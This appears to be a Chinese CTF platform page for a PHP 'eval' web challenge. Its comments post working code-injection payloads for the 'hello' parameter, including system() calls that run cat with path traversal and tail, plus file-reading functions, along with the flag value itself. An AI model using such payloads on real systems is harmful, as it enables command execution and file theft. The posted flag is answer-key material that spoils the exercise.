evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 18076
提  示:
描  述:
eval
评论
anguilin 3年前

http://114.67.175.224:18361/?hello=system(%27cat%20../../../../../../../../flag%27)简单

回复 1

acela 3年前

flag{932241d0a39e2c7a1fe31a9a7dd89594};

回复 0

wenroudeyanhuo 3年前

please input a?

回复 0

aoikuuun 3年前

/?hello=system("tail%20-n%202%20flag.php")

回复 0

GH0S7 3年前

我真棒

回复 0

K463726543 3年前

hello=highlight_file('./flag.php') highlight_file() 使用highlight()函数能在编译器编译后能显示出文件源代码,并且在浏览器中打开时也能显示源代码。

回复 1

SecI302 3年前

踩坑了用这个file_get_contents(“/flag”); 读了半天都是只显示长度没有内容

回复 0

Cat00011cat 3年前

http://114.67.175.224:10794/?hello=file(%27flag.php%27)

回复 1
musewithwind 3年前

@D4C 构造php函数,看代码,vardump函数用于打印变量信息,file函数获取的是flag.php源文件,此时使用vardump打印即是包括注释的flag.php源代码,flag就出来了

回复 0

D4C 3年前

大佬能不能给小白讲讲原理啊

回复 0

小王爱吃螺蛳粉 3年前

有eval可能有命令提交漏洞,知道本题引用了“flag.php”,便可以通过file函数将eval("var_dump($a);")就是把$a的内容打印出来

回复 1

风灵丨玉秀 3年前

/?hello="flag.php"

回复 0

WriteUp

image
harry

1 金币

评分(10)

解题动态

柒柒77 攻破了该题 16分钟前
zz0607 攻破了该题 19分钟前
gongyy 攻破了该题 48分钟前
巴咕噜182 攻破了该题 2小时前
SurPLus007 攻破了该题 2小时前
zhaowenxin 攻破了该题 7小时前
yang0000 攻破了该题 16小时前
Biscuitvv 攻破了该题 16小时前
香蕉君 攻破了该题 19小时前
四叠半神话大系 攻破了该题 21小时前
lnboxue 攻破了该题 21小时前
chi 攻破了该题 22小时前
aboic 攻破了该题 1天前
youbug 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
lance 攻破了该题 1天前
彭彭 攻破了该题 1天前
qwaeawd 攻破了该题 1天前
zzuer 攻破了该题 1天前
chenwei001 攻破了该题 1天前
问题反馈